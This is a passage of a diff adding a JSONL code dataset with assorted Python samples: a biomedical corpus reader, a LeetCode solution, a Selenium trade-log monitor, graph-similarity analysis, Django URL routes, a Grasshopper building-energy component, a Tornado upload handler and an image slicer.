diff --git "a/2202.jsonl" "b/2202.jsonl" new file mode 100644--- /dev/null +++ "b/2202.jsonl" @@ -0,0 +1,730 @@ +{"seq_id":"497956673","text":"import os\nimport codecs\nfrom warnings import warn\nfrom collections import defaultdict\n\nENCODING = 'utf-8'\n\nclass Entity():\n\n def __init__(self, splits):\n self.pmid = splits[0]\n self.tid = splits[1]\n self.ttype = splits[2]\n self.start = int(splits[3])\n self.end = int(splits[4])\n self.text = splits[5]\n \n def __str__(self):\n \"\"\"String representation.\"\"\"\n return '{}\\t{}\\t{}\\t({}:{})'.format(self.pmid, self.ttype, self.text, self.start, self.end)\n\n\nclass Relation():\n type = 'na'\n\n def __init__(self, pmid, arg1, arg2, rtype):\n \"\"\"Init.\"\"\"\n assert isinstance(arg1, Entity)\n assert isinstance(arg2, Entity)\n self.pmid = str(pmid).strip()\n self.arg1 = arg1\n self.arg2 = arg2\n self.rtype = str(rtype).strip()\n\n\n def __str__(self):\n \"\"\"String representation.\"\"\"\n return '{} ({}->{})'.format(self.rtype, self.arg1.ttype,\n self.arg2.ttype)\n \nclass Document(object):\n def __init__(self, doc_id, text):\n\n self.doc_id = doc_id\n\n self.no_text = True\n self.text = text\n\n self.annot = []\n self.entities = []\n self.entities_dict = dict()\n self.entities_dict1 = dict()\n self.relations = [] \n #self.relations_dict = defaultdict(dict) \n\n\nclass Corpus(object):\n \n\n def __init__(self, corpus_dir, is_test=False):\n self.basename = os.path.basename(corpus_dir)\n self.txt_path = os.path.join(corpus_dir, self.basename + '_abstracts.tsv')\n self.ent_path = os.path.join(corpus_dir, self.basename + '_entities.tsv')\n self.is_test = is_test\n if not is_test:\n self.rel_path = os.path.join(corpus_dir, self.basename + '_gold_standard.tsv')\n\n self.docs = dict()\n self.doc_ids = set()\n\n self.split_doc()\n\n\n def split_doc(self):\n with codecs.open(self.txt_path, encoding=ENCODING) as f_txt:\n for line in f_txt:\n (pmid, title, text) = line.strip().split('\\t')\n self.doc_ids.add(pmid) \n self.docs[pmid] = Document(pmid, title + '\\t' + text)\n\n print (\"# of docs: %d\" % len(self.docs))\n\n with codecs.open(self.ent_path, encoding=ENCODING) as f_ent:\n for line in f_ent:\n splits = line.strip().split('\\t')\n assert len(splits) == 6\n ent = Entity(splits)\n # corpus -> doc -> entities -> entity\n self.docs[ent.pmid].entities_dict[ent.tid] = ent\n self.docs[ent.pmid].entities_dict1[(ent.start, ent.end, ent.ttype, ent.text)] = ent.tid\n self.docs[ent.pmid].entities.append(ent)\n\n if self.docs[ent.pmid].text[ent.start: ent.end] != ent.text:\n print (\"txt: \\\"%s\\\" -> annot:\\\"%s\\\"\\t\\t%s\" % \\\n (self.docs[ent.pmid].text[ent.start: ent.end],\n ent.text,\n line))\n\n if not self.is_test:\n with codecs.open(self.rel_path, encoding=ENCODING) as f_rel:\n for line in f_rel:\n splits = line.strip().split('\\t')\n\n if len(splits) == 4:\n pmid = splits[0]\n arg1 = self.docs[pmid].entities_dict[splits[2][5:]]\n arg2 = self.docs[pmid].entities_dict[splits[3][5:]]\n rtype = splits[1]\n rel = Relation(pmid, arg1, arg2, rtype)\n self.docs[rel.pmid].relations.append(rel)\n #self.docs[rel.pmid].relations_dict[rel.arg1][rel.arg2] = rel\n\n else:\n print (\"annot format error: \" + line)\n","sub_path":"data_utils/chemprot/brat.py","file_name":"brat.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"271648531","text":"class Solution:\n def longestPalindrome(self, s: str) -> int:\n longest = 0\n count = {}\n for c in s:\n if c 
not in count:\n count[c] = 0\n count[c] += 1\n for c in count:\n longest += count[c] // 2 * 2\n if longest % 2 == 0 and count[c] % 2:\n longest += 1\n return longest\n","sub_path":"lc/409.py","file_name":"409.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"181832158","text":"# Licensed under a 3-clause BSD style license - see file LICENSE\n\n\nimport unittest\nimport ccat.swdm.osd_api.osd_api as osd\nimport data.OSD_function_specifications as functions\nimport sprocConn\n\nclass TestCCAT_SWDM_osd_api(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Create the keyword arguments to the functions under testing\"\"\"\n self.kwargs = {'function_name':'file_location_adder_or_getter',\n 'system_file_id':'1', 'containing_file_path':r'C:\\users\\doofenshmirz\\logs',\n 'full_file_path':\n r'C:\\users\\doofenshmirz\\logs\\20161212T12:34.285TransmogrificationLog6.txt'}\n\n\n def test_execute_function(self):\n \"\"\"Test operation without a database using a given set of keyword inputs\"\"\"\n sprocDict = osd.sproc_parameter_generation(self.kwargs, \n functions.funcSpec[self.kwargs[\"function_name\"]])\n #expected sprocDict\n x = {'@containing_file_path': r\"'C:\\users\\doofenshmirz\\logs'\",\n '@full_file_path':\n r\"'C:\\users\\doofenshmirz\\logs\\20161212T12:34.285TransmogrificationLog6.txt'\",\n '@system_file_id': '1'}\n self.assertEqual(sprocDict,x)\n\n queryString = osd.queryGen(self.kwargs)\n #expected query string\n x = r\"exec spFileLocationAdderOrGetter\"+\\\n r\" @containing_file_path='C:\\users\\doofenshmirz\\logs',\"+\\\n r\"@full_file_path='C:\\users\\doofenshmirz\\logs\\20161212T12:34.\" +\\\n \"285TransmogrificationLog6.txt',\"+\\\n r\"@system_file_id=1\"\n self.assertEqual(queryString,x)\n \n #sprocConn.Conn is a faked-up pyodbc connection object for testing purposes\n con = sprocConn.Con([[1,2],[3,4],[5,6],[7,8]])\n results = osd.execute_function(con, 2, 200, **self.kwargs)\n self.assertEqual([(1,2),(3,4),(5,6),(7,8)],results)\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","sub_path":"osd-api/ccat/swdm/osd_api/tests/test_osd_api.py","file_name":"test_osd_api.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"399580874","text":"'''\nCreated on Mar 27, 2016\ncertain sites do not like being scraped, to get around this python needs to pretend to be a browser.\nYou need to download the program chrome driver http://chromedriver.storage.googleapis.com/index.html\nI use 2.9 win32\njust place chromedriver.exe into the same directory as this app\nInstructions:\nThis has limited features and so requires some playing with at least until someone else or I make it more user friendly\nYou need to be logged in order for it to work. 
After the first time you log in, it should be able to run automatically,\nyou can open up a new tab and use the c-cex website normally but you don't want to work on the first tab the app opens\nany questions or comments you can contact me at: \nnoe@stakeco.in \nother requirements:\nselenium\npip install selenium\n\n\n\n@author: Noe\n'''\nfrom multiprocessing.managers import State\nurl = 'https://c-cex.com/?id=h&fr=&offset=&f=3'\nimport pickle\nfrom selenium import webdriver\n\n\nimport time\nimport os\nimport winsound\n\nimport re\n\n\nurl = 'https://c-cex.com/?id=h&fr=&offset=&f=3'\n\nclass LogMon():\n def __init__(self, browser, browserconf):\n self.browser = browser\n self.browserconf = browserconf\n \n \n \n def set_strtbutton(self, strtbutton, rfreshlabel, ltradelabel, stslabel):\n self.strtbutton = strtbutton\n self.rfreshlabel = rfreshlabel\n self.ltradelabel = ltradelabel\n self.stslabel = stslabel\n \n def set_orderstatus(self, _orderstatustwo=None):\n self.orderstatustwo = _orderstatustwo\n \n \n \n def getlog(self):\n \n self.strtbutton.config(state='disable')\n \n self.stslabel['text']='currently monitoring'\n self.stslabel['bg']='green'\n \n \n \n self.browser.refresh()\n time.sleep(5)\n orderstatus = self.browserconf.orderstatus('//*[@id=\"flog\"]/table/tbody/tr[2]/td[1]', '//*[@id=\"flog\"]/table/tbody/tr[2]/td[5]', self.browser, self.browserconf)\n self.ltradelabel['text']=str('Last trade accured at ' + str(re.findall('\\d{4}\\-\\d{2}\\-\\d{2}\\s\\d{2}\\:\\d{2}\\:\\d{2}',orderstatus)).replace('u',''))\n \n return orderstatus\n\nclass ordmonsel:\n \n\n \n\n\n def setupbrowser(self):\n \n\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument('--test-type')\n return webdriver.Chrome(chrome_options=chrome_options)\n \n \n def loadcookies(self, browser):\n _browser=browser\n if os.path.isfile('cookies.pkl'):\n cookies = pickle.load(open('cookies.pkl', 'rb'))\n for cookie in cookies:\n _browser.add_cookie(cookie)\n \n def savecookies(self, browser):\n _browser=browser\n pickle.dump( _browser.get_cookies() , open(\"cookies.pkl\",\"wb\"))\n \n\n\n def orderstatus(self, date, info, browser, browserconf):\n _browser =browser\n \n _browserconf = browserconf\n \n _browserconf.savecookies(browser)\n transdate = browser.find_element_by_xpath(date).text\n transinfo = browser.find_element_by_xpath(info).text\n return transdate + transinfo\n \n def ordalert(self):\n \n ostop = None\n while not ostop:\n \n \n winsound.PlaySound('SystemAsterisk', winsound.SND_ALIAS | winsound.SND_ASYNC | winsound.SND_LOOP )\n\n \n ostop = 'stop'\n winsound.PlaySound('SystemAsterisk', winsound.SND_PURGE)\n \n def alertstop(self):\n winsound.PlaySound('SystemAsterisk', winsound.SND_ALIAS | winsound.SND_ASYNC | winsound.SND_LOOP )\n \n def alertstart(self):\n winsound.PlaySound('SystemAsterisk', winsound.SND_PURGE)\n \n \n \n def openlogpage(self, browser, browserconf, strtbutton):\n _strtbutton =strtbutton\n _strtbutton.config(state='normal')\n _browser = browser\n _browserconf = browserconf\n _browser.get(url)\n _browserconf.loadcookies(_browser)\n _browser.get(url)\n \n","sub_path":"src/ordmonsel.py","file_name":"ordmonsel.py","file_ext":"py","file_size_in_byte":4045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330446355","text":"#!/usr/bin/python3\n\nimport sys\nimport datetime\nimport csv\nimport networkx as nx\n#import graphsim as gs\nimport numpy as np\nimport scipy as sp\nsys.path.append('../Network/')\nfrom make_network 
import Build_Network\nfrom crime_network import Crime_Network\nfrom police_network import Police_Network\nfrom service_community import ServiceNetwork\nfrom community_libraries import Library_Network\nfrom school_network import SchoolNetwork\nfrom path import Path\n\nclass FindSimilarity:\n \"\"\" Implementation of different similarity measures. \"\"\"\n\n def __init__(self, year, month=1, load=True):\n \"\"\" Accept the graph, G \"\"\"\n\n self.node_index = {}\n self.index_node = {}\n\n if (load == True):\n print (\"Loading data\")\n self.G = self.load_data (year, month)\n\n def _iterator_matrix(self, itr, m, save=False, path=\"sim.csv\", norm=False):\n \"\"\" Converts a iterator to numpy matrix\"\"\"\n\n sim = np.zeros ((m, m))\n\n for i, j, k in itr:\n if (i > 77 or j > 77):\n continue\n if (norm == True):\n sim[i-1, j-1] = k/100\n sim[j-1, i-1] = k/100\n else:\n sim[i-1, j-1] = k\n sim[j-1, i-1] = k\n\n for i in range (m):\n sim [i - 1, i - 1] = 1\n\n if (save == True):\n with open(path, 'w') as csvoutput:\n writer = csv.writer(csvoutput, lineterminator='\\n')\n writer.writerows(sim)\n\n return (sim)\n\n def ascos_similarity (self):\n \"\"\" Uses graphsim node node similarity to find similarity between communities. \"\"\"\n\n node_ids = self.G.nodes ()\n #sim = gs.ascos (self.G, is_weighted=True)\n return (sim)\n\n def get_community_nodes (self):\n \"\"\" Returns list of (u, v) from all communities to all communities. \"\"\"\n\n #Nodes contain all possible (source, target) edges\n nodes = []\n\n #Generate all possible combination of edges\n for i, s in enumerate (self.G.nodes ()):\n for j, t in enumerate (self.G.nodes ()):\n if (s > 77 or t > 77):\n continue\n \n nodes.append ((s, t))\n return (nodes)\n\n def jaccard_similarity(self, only_community=True):\n \"\"\" Finds the jacardian coefficient similarity\"\"\"\n\n nodes = self.get_community_nodes ()\n\n #Find jaccard similarity\n jacc_sim_itr = nx.jaccard_coefficient(self.G, nodes) \n\n #Print similarity matrix\n return (self._iterator_matrix (jacc_sim_itr, 77, save=True, path=\"sim_jacard_2015.csv\"))\n\n def adam_similarity (self):\n \"\"\" Finds adam similarity. \"\"\"\n\n #Get communities nodes\n nodes = self.get_community_nodes ()\n\n #Find adam similarity\n adam_sim_itr = nx.adamic_adar_index(self.G) \n\n #Return similarity matrix\n return (self._iterator_matrix (adam_sim_itr, 77, save=True, path=\"sim_adam.csv\", norm=True))\n\n def pseudo_inverse_laplacian(self):\n \"\"\" Getting the pseudo inverse to obtain the random walk similarity\"\"\"\n\n nodes = self.get_community_nodes ()\n\n L = nx.laplacian_matrix(self.G)\n\n dense_L = L.todense()\n\n pinv_L = np.linalg.pinv(dense_L)\n \n inv_L = pinv_L.A\n \n inv_L = inv_L [0:77, 0:77]\n\n self._inverse_nomalize(inv_L)\n\n np.savetxt (\"pseudo_inverse_laplacian.txt\", inv_L)\n\n return (inv_L)\n\n def _inverse_nomalize (self, inv_L):\n \"\"\" Normalize the ouput from inverse laplacian matrix. \"\"\"\n \n print (\"Size of each row: {}\".format (np.size(inv_L, axis=1)))\n for i in range(np.size(inv_L, axis=1)):\n d = inv_L[i, i]\n m = np.min(inv_L[i, :])\n \n for j in range (np.size(inv_L, axis=1)):\n inv_L[i, j] = inv_L[i, j] - m / d\n\n def load_data (self, year=2015, month=1):\n \"\"\" Load the chicago crime data and represent as network. 
\"\"\"\n\n self.load = True\n\n path = Path ()\n net = Build_Network ()\n net.load_network (year=year, month=month)\n self.attr = net.get_attributes ()\n G = net.get_network ()\n\n return (G)\n\n def get_similarity (self, jaccard=True, r_walk=False, adam=False):\n \"\"\" Returns similarity for loaded network. \"\"\"\n\n if (self.load == False):\n print (\"Please load the network first. Ex: similarity.load_data ()\")\n return (-1)\n\n if (jaccard == True or adam == True or r_walk == True):\n if (jaccard == True and adam == False and r_walk == False):\n return ([self.jaccard_similarity(), self.G])\n elif (jaccard == False and adam == True and r_walk == False):\n return ([self.adam_similarity(), self.G])\n elif (jaccard == False and adam == False and r_walk == True):\n return ([self.pseudo_inverse_laplacian (), self.G])\n else:\n return (self.G)\n\n def get_attributes (self):\n \"\"\" Returns attributes of the network. \"\"\"\n\n if (self.load == False):\n print (\"Please load the network first. Ex: similarity.load_data ()\")\n return (-1)\n\n return (self.attr)\n\nif (__name__ == '__main__'):\n\n sim = FindSimilarity(2015, month=1)\n sim.adam_similarity ()\n sim.jaccard_similarity ()\n sim.pseudo_inverse_laplacian ()\n #sim.pseudo_inverse_laplacian ()\n #attr = sim.get_attributes ()\n","sub_path":"Code/Analysis/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"432905190","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.urls import path\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.views.defaults import page_not_found, server_error\nfrom django.views.generic.base import RedirectView, TemplateView\n\nfrom wagtail.admin import urls as wagtailadmin_urls\nfrom wagtail.core import urls as wagtail_urls\nfrom wagtail.documents import urls as wagtaildocs_urls\nfrom wagtail.contrib.sitemaps.views import sitemap\nfrom wagtail.images.views.serve import ServeView\n\nfrom core.views import search\n\n\n# Non-translatable URLs\nurlpatterns = [\n url(r\"^api/\", include(\"api.urls\")),\n url(r\"^admin/\", include(wagtailadmin_urls)),\n url(r\"^documents/\", include(wagtaildocs_urls)),\n url(\n r\"^images/([^/]*)/(\\d*)/([^/]*)/[^/]*$\",\n ServeView.as_view(action=\"redirect\"),\n name=\"wagtailimages_serve\",\n ),\n url(r\"^sitemap\\.xml$\", sitemap, name=\"sitemap\"),\n url(\n r\"^robots\\.txt$\",\n TemplateView.as_view(template_name=\"robots.txt\", content_type=\"text/plain\"),\n ),\n]\n\n# Translatable URLs\nurlpatterns += i18n_patterns(\n url(r\"^404/$\", page_not_found, kwargs={\"exception\": Exception(\"Page not Found\")}),\n url(r\"^500/$\", server_error),\n url(r\"^search/\", search, name=\"search\",),\n url(r\"\", include(wagtail_urls)),\n)\n\n\n# hacky redirects:\nurlpatterns += [\n url(\n r\"^lueneburg/(?P.*)\",\n RedirectView.as_view(url=\"/netzwerk-projekte/janun-lüneburg/%(path)s\"),\n ),\n url(\n r\"^weltbewusst-lg\",\n RedirectView.as_view(\n url=\"/netzwerk-projekte/janun-lüneburg/weltbewusst-lüneburg-neu/\"\n ),\n ),\n url(\n r\"^scp\",\n RedirectView.as_view(\n url=\"/netzwerk-projekte/janun-landesbüro/silent-climate-parade/\"\n ),\n ),\n url(\n r\"^herbstspektakel\",\n RedirectView.as_view(\n url=\"/netzwerk-projekte/janun-landesbüro/herbstspektakel/\"\n ),\n ),\n url(\n r\"^imagine\", RedirectView.as_view(url=\"/veranstaltungen/herbstspektakel-2017/\")\n ),\n url(r\"^stadttraum\", 
RedirectView.as_view(url=\"/veranstaltungen/stadttraum/\")),\n url(\n r\"^veranstaltungen/herbstspektakel-2018\",\n RedirectView.as_view(url=\"/veranstaltungen/stadttraum/\"),\n ),\n url(\n r\"^netzwerk-projekte/janun-landesbuero/(?P.*)\",\n RedirectView.as_view(url=\"/netzwerk-projekte/janun-landesbüro/%(path)s\"),\n ),\n url(\n r\"^netzwerk-projekte/janun-landesb%FCro/(?P.*)\",\n RedirectView.as_view(url=\"/netzwerk-projekte/janun-landesbüro/%(path)s\"),\n ),\n url(r\"^festival\", RedirectView.as_view(url=\"/veranstaltungen/janun-festival/\")),\n url(r\"^webinare\", RedirectView.as_view(url=\"/veranstaltungen/?typ=Online\")),\n]\n\n\n# Serve static and media files from development server\nif settings.DEBUG:\n from django.conf.urls.static import static\n from django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n urlpatterns += staticfiles_urlpatterns()\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n","sub_path":"janunde/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397322023","text":"# This comoponent creates a zone made of elements: the user is allowed \n# to override the default attributes and customize it.\n#\n# Hive: A energy simulation plugin developed by the A/S chair at ETH Zurich\n# This component is based on building_physics.py in the RC_BuildingSimulator Github repository\n# https://github.com/architecture-building-systems/RC_BuildingSimulator\n# Extensive documentation is available on the project wiki.\n#\n# Author: Justin Zarb \n#\n# This file is part of Hive\n#\n# Licensing/Copyright and liability comments go here.\n# \n# \n\n\"\"\"\nCreate a customized zone using elements as inputs.\nParameters left blank will be filled with default values.\n-\nProvided by Hive 0.0.1\n \n Args:\n glazed_elements: Element objects with additional glazing properties\n opaque_elements: Element objects\n thermal_bridges: Linear thermal bridge objects\n floor_area: [default=] The conditioned floor area within the zone\n zone_volume: [default=] Volume of the zone being simulated [m^2]\n thermal_capacitance_per_floor_area: [default=165000] Thermal capacitance of the room per \n floor area [J/m2K]. Lightweight = 18000, medium weight = 165000, heavyweight = 360000\n lighting_load: [default=11.7] Lighting Load [W/m2] \n lighting_control: [default=300] Lux threshold at which the lights turn on [Lx]\n lighting_utilization_factor: [default=0.45] How the light entering the window is \n transmitted to the working plane\n lighting_maintenance_factor: [default=0.9] How dirty the window is\n ach_vent: [default= 1.5] Air changes per hour through ventilation \n ach_infl: [default= 0.5] Air changes per hour through infiltration \n ventilation_efficiency: [default=0] The efficiency of the heat recovery system for ventilation. Set to 0 if there is no heat \n recovery.\n t_set_heating : [default=20] Thermal heating set point [C]\n t_set_cooling: [default=26] Thermal cooling set point [C]\n max_cooling_energy_per_floor_area: [default=12] Maximum cooling load. Set to -np.inf for unrestricted cooling [C]\n max_heating_energy_per_floor_area: [default=-12] Maximum heating load per floor area. Set to no.inf for unrestricted heating [C]\n heating_supply_system: The type of heating system. Choices are DirectHeater, ResistiveHeater, HeatPumpHeater. 
\n Direct heater has no changes to the heating demand load, a resistive heater takes an efficiency into account, \n HeatPumpHeatercalculates a COP based on the outdoor and system supply temperature \n cooling_supply_system: The type of cooling system. Choices are DirectCooler HeatPumpCooler. \n DirectCooler has no changes to the cooling demand load, \n HeatPumpCooler calculates a COP based on the outdoor and system supply temperature \n heating_emission_system: How the heat is distributed to the building\n cooling_emission_system: How the cooling energy is distributed to the building\n Returns:\n readMe!: ...\n Zone: ModularRCZone object\n Zone1_string_: a string which can be pasted into a Python script to test the Building object\n Zone2_string_: a string which can be pasted into a Python script to test the ElementBuilding object\n \n\"\"\"\n\nghenv.Component.Name = \"Hive_Zone2\"\nghenv.Component.NickName = 'Zone2'\nghenv.Component.Message = 'VER 0.0.1\\nMAY_25_2018'\nghenv.Component.IconDisplayMode = ghenv.Component.IconDisplayMode.application\nghenv.Component.Category = \"Hive\"\nghenv.Component.SubCategory = \"1 | Zone\"\n# ComponentExposure=2\n\nimport scriptcontext as sc\nimport Grasshopper.Kernel as gh\nimport Grasshopper.Kernel as ghKernel\nHivePreparation = sc.sticky['HivePreparation']()\nimport math\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\ndef main(elements,thermal_bridges,thermal_attributes,lighting_attributes):\n if not sc.sticky.has_key('ThermalZone'): return \"Add the modular RC component to the canvas!\"\n \n #Declare zone\n ThermalZone = sc.sticky['ThermalZone'](elements = elements,\n thermal_bridges = thermal_bridges,\n floor_area = thermal_attributes['floor_area'],\n volume = thermal_attributes['volume'],\n thermal_capacitance_per_floor_area=thermal_attributes['thermal_capacitance_per_floor_area'],\n ach_vent=thermal_attributes['ach_vent'],\n ach_infl=thermal_attributes['ach_infl'],\n ventilation_efficiency=thermal_attributes['ventilation_efficiency'],\n t_set_heating = thermal_attributes['t_set_heating'],\n t_set_cooling = thermal_attributes['t_set_cooling'],\n max_heating_energy_per_floor_area = thermal_attributes['max_heating_energy_per_floor_area'],\n max_cooling_energy_per_floor_area = thermal_attributes['max_cooling_energy_per_floor_area'],\n heating_supply_system=thermal_attributes['heating_supply_system'],\n cooling_supply_system=thermal_attributes['cooling_supply_system'],\n heating_emission_system=thermal_attributes['heating_emission_system'],\n cooling_emission_system=thermal_attributes['cooling_emission_system'],\n )\n ThermalZone.summary()\n \n # Zone with thermal and lighting attributes\n Zone = sc.sticky['RCModel'](zone=ThermalZone, \n lighting_load=lighting_attributes['lighting_load'],\n lighting_control=lighting_attributes['lighting_control'],\n lighting_utilisation_factor=lighting_attributes['lighting_utilisation_factor'],\n lighting_maintenance_factor=lighting_attributes['lighting_maintenance_factor'])\n \n return Zone\n\ndef raise_error(error_str):\n error = error_str\n e = ghKernel.GH_RuntimeMessageLevel.Error\n ghenv.Component.AddRuntimeMessage(e, error)\n \ndef raise_warning(warning_str):\n warning = warning_str\n w = ghKernel.GH_RuntimeMessageLevel.Warning\n ghenv.Component.AddRuntimeMessage(w, warning)\n\ndef zone_object_string(Zone,unique_inputs,thermal_attributes):\n \n room_sqrt_area = math.sqrt(Zone.floor_area)\n room_height = 
volume/Zone.floor_area\n \n if 'elements' in unique_inputs.keys():\n window_area = sum([e.area for e in unique_inputs['elements'] if not e.opaque])\n external_envelope_area = sum([e.area for e in unique_inputs['elements']])\n wall_area = sum([e.area for e in unique_inputs['elements'] if e.opaque])\n u_windows = sum([e.area * e.u_value for e in unique_inputs['elements'] if not e.opaque])/window_area\n u_walls = sum([e.area * e.u_value for e in unique_inputs['elements'] if e.opaque])/wall_area\n \n classic_zone_inputs = {'room_depth':room_sqrt_area,\n 'room_width':room_sqrt_area,\n 'room_height':room_height,\n 'window_area':window_area,\n 'external_envelope_area':external_envelope_area,\n 'u_windows':u_windows,\n 'u_walls':u_walls}\n for k in unique_inputs:\n if k not in ['floor_area','thermal_bridges','elements','volume']:\n classic_zone_inputs[k] = unique_inputs[k]\n \n for t in thermal_attributes.keys():\n if 'supply' in t:\n classic_zone_inputs[t] = 'supply_system.'+str(thermal_attributes[t])[9:]\n if 'emission' in t:\n classic_zone_inputs[t] = 'emission_system.'+str(thermal_attributes[t])[9:]\n\n zone1 = 'Building('\n for k,v in classic_zone_inputs.iteritems():\n zone1 += k\n zone1 += '='\n zone1 += str(v)\n zone1 += ',\\n'\n zone1 += ')'\n \n zone2 = 'ElementBuilding('\n for k,v in unique_inputs.iteritems():\n zone2 += k\n zone2 += '='\n zone2 += str(v)\n zone2 += ', '\n zone2 += ')'\n\n return zone1, zone2\n \n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n# Initialize default values which will be used if no input is detected\nthermal_attributes = {\"elements\":None,\n \"thermal_bridges\":None,\n \"floor_area\":34.3,\n \"volume\":106.33,\n \"thermal_capacitance_per_floor_area\":165000,\n \"ach_vent\":1.5,\n \"ach_infl\":0.5,\n \"ventilation_efficiency\":0,\n \"t_set_heating\":20,\n \"t_set_cooling\":26,\n \"max_heating_energy_per_floor_area\":12,\n \"max_cooling_energy_per_floor_area\":-12,\n \"heating_supply_system\":sc.sticky[\"DirectHeater\"],\n \"cooling_supply_system\":sc.sticky[\"DirectCooler\"],\n \"heating_emission_system\":sc.sticky[\"AirConditioning\"],\n \"cooling_emission_system\":sc.sticky[\"AirConditioning\"]\n }\nlighting_attributes = {'lighting_load':11.7,\n 'lighting_control':300.0,\n 'lighting_utilisation_factor':0.45,\n 'lighting_maintenance_factor':0.9}\n\n\n# Replace default values with whatever is inputted to the component\nunique_inputs = {}\n\nfor t in thermal_attributes.keys():\n if locals()[t] is not None:\n thermal_attributes[t] = locals()[t]\n # Add item to unique_inputs\n if 'supply' not in t and 'emission' not in t:\n value = locals()[t]\n elif 'supply' in t:\n value = t+': supply_system.'+str(locals()[t])[22:-2]\n elif 'emission' in t:\n value = t+': emission_system.'+str(locals()[t])[22:-2]\n unique_inputs[t] = value\n\n# Add lighting attributes\nfor l in lighting_attributes.keys():\n if locals()[l] is not None:\n lighting_attributes[l] = locals()[l]\n value = l+':'+str(locals()[l])\n unique_inputs[l] = value\n\n# Initialise thermal bridges\nt = [x for x in thermal_bridges if x is sc.sticky['ThermalBridge']]\nif len(t) != len(thermal_bridges):\n raise_error(\"Invalid thermal bridge detected\")\nif len(t) == 0:\n thermal_bridges = None\n\n# Initialise elements\nif any([type(e).__name__!='Element' for e in elements]):\n raise_error('Invalid Element input')\n\nelif len(elements) == 0:\n Zone = 
main(None,thermal_bridges,thermal_attributes,lighting_attributes)\n Zone1_string_, Zone2_string_ = zone_object_string(Zone,unique_inputs,thermal_attributes)\nelse:\n Zone = main(elements,thermal_bridges,thermal_attributes,lighting_attributes)\n Zone1_string_, Zone2_string_ = zone_object_string(Zone,unique_inputs,thermal_attributes)\n","sub_path":"Core/HIVE_RC_simulator/src/Hive_Zone2.py","file_name":"Hive_Zone2.py","file_ext":"py","file_size_in_byte":10933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146081688","text":"import tornado.web\nimport os\nimport json\n\nclass Index(tornado.web.RequestHandler):\n\n def get(self, *args, **kwargs):\n #print(\"hello, world\")\n self.write(\"hello,world\\n\")\n\nclass Upload(tornado.web.RequestHandler):\n\n def get(self, *args, **kwargs):\n self.write(json.dumps({'url':'/static/cartoon/test.jpg'}))\n\n def post(self, *args, **kwargs):\n server_path_prefix = 'https://test.s.ads.sohu.com/'\n file_imgs = self.request.files.get('img',None)\n hex_color = self.get_argument(\"color\", 'A25356')\n hex_color = hex_color.strip()\n hex_color = hex_color.lstrip('#')\n print(\"show color\",hex_color)\n #print(hex_color)\n file_img = file_imgs[0]\n image_key = hex_color + '_' + file_img['filename']\n image_download_path = 'static/uploads/{}'.format(image_key)\n image_processed_path = 'static/makeup/{}'.format(image_key)\n #print(type((file_img['body'])))\n with open(image_download_path, 'wb') as f:\n f.write(file_img['body'])\n rgb_color = self.HEX_to_RGB(hex_color)\n\n #print(file_imgs)\n self.write(json.dumps({'url':server_path_prefix + image_processed_path}))\n\n def HEX_to_RGB(self, hex):\n r = int(hex[0:2], 16)\n g = int(hex[2:4], 16)\n b = int(hex[4:6], 16)\n return [r, g, b]\n\n\ndef HEX_to_RGB(hex):\n hex = hex.strip()\n hex = hex.lstrip('#')\n r = int(hex[0:2],16)\n g = int(hex[2:4],16)\n b = int(hex[4:6],16)\n return [r, g, b]\n\nif __name__ == '__main__':\n #################################################################\n print(HEX_to_RGB(\"#A25356\"))\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"510757052","text":"# Training data slicer: change tif to jpeg and then slice up large image into smaller tiles\r\n\r\nimport os\r\nfrom PIL import Image\r\nimport image_slicer\r\n\r\n\r\n# Converts tif to jpg and saves image; tif_img and jpeg_img are file names\r\ndef convert_tif_to_jpeg(tif_img, jpeg_img):\r\n\r\n image = Image.open(\r\n tif_img)\r\n image.convert(mode='RGB')\r\n image.save(jpeg_img)\r\n\r\n return\r\n\r\n\r\n# Slices the image and saves each slice; jpeg_img is file name, num_slices is int number of slices, jpeg_slices is file name, slice_name is prefix for each slice\r\ndef slice_jpeg(jpeg_img, num_slices, jpeg_slices_folder, slice_name):\r\n\r\n tiles = image_slicer.slice(\r\n jpeg_img, num_slices, save=False)\r\n image_slicer.save_tiles(tiles, directory=jpeg_slices_folder,\r\n prefix=slice_name, format='jpeg')\r\n\r\n return\r\n\r\n\r\n# Converts all tif images in folder to jpeg slices in separate folder\r\ndef convert_tif_to_jpeg_slices(tif_image_list, tif_img_directory, jpeg_img_directory, jpeg_slices_directory, num_slices):\r\n\r\n for x in range(len(tif_image_list)):\r\n tif_img_directory = 